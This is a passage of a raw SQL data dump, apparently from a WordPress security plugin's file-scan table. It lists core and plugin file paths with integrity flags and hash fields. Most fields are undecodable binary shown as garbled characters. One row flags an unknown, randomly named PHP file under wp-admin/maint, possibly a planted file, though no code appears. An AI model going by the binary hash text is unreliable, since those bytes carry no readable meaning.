Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zcu�	L����t�p','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�,��F1,iI��s��','wp-content/plugins/wp-cerber/assets/fonts/roboto/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�6ɮ�ͯvB,O�','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��銻~F�a8U�\'v','��j{y˔���5N�1��ޝ���2콲��','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��x����h3\\','��U�~��A�Vkr�%R�x$p��Z1�\"�U�','',0,'?'),('�N6?`$�Qil�L','wp-content/plugins/wp-cerber/assets/flags/pe.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:���Z�d�D�\'y�1','8����,0��M߀�����҃��WO1q�','',0,'?'),('�SK�8kf�k��X�ҍ\\','wp-content/plugins/wp-cerber/assets/flags/ke.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��K�PS���P�X','�_��/�6�pp����	6�4�zI\0ֱ�Éf','',0,'?'),('���Fճ�D~֫�Cʽ�','wp-includes/css/dist/edit-post/classic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֶU����M��m�','�Ȓn�x(n/ſ���X>�v)�x������J','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';.h�󑜪;tA����k','@!9�Yc*��<��:����ﭕrw�שD�','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�W݈\\w&�c�P�','���j�+��]-�HO����gĩ>\"��O�,','',0,'?'),('���@��\'�y����q�','wp-includes/blocks/query-pagination/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�2�;���\0�a�*E','����`��E�	�!w�w�������q�Y��sf�','',0,'?'),('�K��c��1%[{�','wp-content/plugins/wordfence/modules/login-security/css/login.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��\0|�\Z1��\r','�F݌\rw,�K��_�m�-��N���\"*�t��F�','',0,'?'),('��kV��7���2�+','wp-includes/blocks/heading/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Fs)�#�1��� 	','�|\Z��6���Q_R�|��)Eo�vS�w,%�~�','',0,'?'),('��J�H6�KF��p~�','wp-includes/blocks/social-link/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W���M\"�:*�7�>','����yR���U=FfA�o�*�s�G\\+�p*�','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��N�.�(��9�J:','#��2]�_(��iqi�Q5�)5W�J��f�3�','',0,'?'),('�=�IU��c�O�G�','wp-content/plugins/wp-cerber/assets/flags/fo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jX�?c0<G�Ia~�','��lNw�ʭ�!X�uw���_9{-]L��/ܐ','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z|���f����?','z�\\��?��+i.��x�7�j���.i����','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('��-�y��[�(�<�%C','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!hQk�ө��Q���`',';�ǐs𙸡��:��;Mȴ�N�x�Cd/��+�','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'�(1\r���\"]��4���','�(1\r���\"]��4���','PM�瀺7�;��j�{��9�p����Q-	s�:a','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Ņ\'�k?�:~����','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�f�q�-kә!���','?,J��\Z</�ٯ�Wf���,:���o��eAe\"','',0,'?'),('��o4}+��8��O�','wp-content/plugins/wp-cerber/assets/flags/nc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5�A/g��4�S�H','�.)Po�\\r�d�	!NZ�Ӆ�8��8E��','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('��)�KK�;���t~�','wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bwn�߃�|�7�w��','�j�w��h�Gv�MxT�~Vew<\"��`��J�<�','',0,'?'),('��k��{m�%� �D�','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4|S�5w76�ae�.��','����!@�08:?\'�d���>\r������	Bn','',0,'?'),('�Z��Q+x�r��0��','wp-includes/blocks/media-text/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�T-�M�%g7�','��\",?sM�|5H1���/��&+�;cޢ���F','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��F�9��Q� ','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�\" 6A��7^�H�','wp-includes/blocks/cover/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�U#& �\0�0Aj','F���q×��O�`?��|�y�!5a/;�3T','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-^{�2�`�D<oY','��ji#7���Rc.�8��狿�ne�Ƨ9','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)�	>','',0,'?'),('�P�otN����\nCb�3a','wp-admin/maint/hnsqbue.php',0,'�I`d��p?�MQi�*�','�I`d��p?�MQi�*�','KYǝ�I\r��|ps5vM%G2�L�J�{�,','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)p†M��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��`+�����a�z�5\Z',']�#�b-�_�X]�g�)�\'��(`o���>~�0','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-ڐ,q\nj�[��dކe','e��5�=qx�5U���#lS��K�;��[���M','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�կ���#�z_\'��+','vT��oC�G��Ng���3�?�Xm��K','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa	y�fh��0v\'u�vm�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\\f����t�','�����#�5���˟�ڰY\Z����\\���:a��','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('�  ��g����%�!�','wp-includes/blocks/site-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�h�|�W���4d$�','<��V��i��L���3l��TZ��nW�9O��','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BX�N��sv �n��~�','c��Y��c�V����9�7e��B;�QYa,�2','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�X*����VL	�_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�\"HL19ңl��Qޮ','��m\\�b��P��|�A�8��o������� z2�','',0,'?'),('�_� ��6T���NG?','wp-includes/blocks/search/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��Ƽ\Z�28�{�k�','�̍M�I:(%�\'U�)Y�Ȋ��\'�>�6','',0,'?'),('�j��I���<꟟��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('�����nJ-2���5W�','wp-includes/blocks/rss/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��>׺\r�h���i','em�����ػI�\rl$uAx���ɭ���g�[','',0,'?'),('��e�\\��1�tƋ�<	�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r�H�!c��M����','�}@ҳ��5�8�zh�A*ѹ�U3Kศi��','',0,'?'),('��V�Z�8�=�v���c','wp-includes/blocks/freeform/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��\n����F�͛�','�680�2f~�0��\\!��h�nBQf\'�','',0,'?'),('��ڸP���ֺb�','wp-includes/blocks/social-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~\'+��L����i�',']����[\'vX���\0����N�hZ�U?����','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��Σڕ�F�ƫ','�p�\rra���.�M̎׆ͻ��X�?�O�NcX�(','',0,'?'),('�!q[-n\rN��m7���','wp-content/plugins/redirection/api/api-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ON[f}�	㥣��\\�','R	�����7\"\n� ��Z:��K��s��1��\Z@','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׼Z��&b���t�a�','J�cɋ��,R(��ճ��\r*��?��˸','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�kIK����V[��	5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('����v�r@�{�c{','wp-includes/blocks/social-link/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>���7��n��	.��','X��Ö��GT�<\0<x\0ob.����$�u2h�','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƗVQ�%�$5�3���','�T�-m�#��^�Η�$f��G4&���Ys','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��Qs|�c�L؜VH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!&���|�\\]','�L��<��P�׺����ġ�̹I~�I\"�v','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to	Q��m�,�j','',0,'?'),('�F#	��{O6yl�]S�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ol��=R�~���}���','c�\Z#za���\Z<�Ӊ:�`��W\'J;�R�L','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���W*�:�F}}�+','.�A��e�V�_�\Z�@h�pCI�KS&J�@�Z�Y<','',0,'?'),('�U��z��c��p��','wp-includes/blocks/separator/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�D��JoA���','\"w�	��u���{[�H�6W�ο��','',0,'?'),('�n97�I.O�ҝ޿�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f(�5�\r;^�\'�','��\0�cޜL+�8�Bw�\"�U�w./0�\nF@J','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4	춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('��[�6��dcHa ','wp-includes/blocks/latest-posts/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�6�)��_���X��','�s@5�֜J�Q��\"Ӹ��qヹU\'��a�gE','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�a�Rd��\\�T','3�����$ׁʌe����}K�+\"~y�``�','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^�	�v�4|f�%�Xg','',0,'?'),('��U�]R���)Y��m','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�j����0�����9','��\Z�Ҩ2�#��s:�Р\n		v��Ø+l�','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�&‡��L��]�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX�	�Q���','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IM4�6s=�cR�]�l','n.�\n�dE\Z�Tg��0C+\ZԶ��S<��Ar\n','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o	}���z�xN��','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fB��i�Ԙ�-T�','J�Q���ޏ1m��d���f��d3�_rg@\r','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�-���.�ݼe���>','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��S%�ќ\"��r�!�','wp-includes/blocks/list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���g��\\a�7`&','O#��D$^���m�ӕ��9�޺��y�H�j','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�zZ�,�)��+��','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('�$��b	���o�&��8�','wp-includes/blocks/button/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B~S�`��+��	�','�X알\r��a l�g>(4����(�*�','',0,'?'),('�CV��%�����i','wp-includes/block-supports/border.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g*P�(�ǴMk��','�vF`��nb\0E��>Ơ3��~\0$-����v','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s�	��.:l���','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|+T��GTt��\0','�r�B~�<W5�9���[;]�ޓ5S��D���','',0,'?'),('��msœ13�oW6`�','wp-content/plugins/redirection/models/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�$��<��ZaY7���','�	�~��a=���\"`�3�XԠ���Bɖ���','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�\Z����:�`','O~�>�[D�*b���5v�m�dyA\Zi_��lB��','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h����Ŕ��c�}m�','������˗pZ�C��Eb�竔�.�u�','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��V��&��<�','\n�\r�Ɉ��,L�깁��\Z��V�zw9C��','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{4m���','�~2�;�S d��ss9@:U=��t���&$�n\0,�','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�)��X�,m�j��T','wp-includes/blocks/post-content/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Np�E�� ;�J{��','��B�@\\H�N8�P��ߣ�D��.���','',0,'?'),('�7�0���,�		M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�C�,ڦ�R1A�	X�','wp-includes/blocks/latest-posts/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�D���y^:�)s�u�','���~7�]�B;s{kc��z����ZrV��|','',0,'?'),('�E�H���!���h�<y','wp-includes/blocks/site-title/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"X�\"OK��9\0�','}	����k_[3�?_�Fx�a������','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)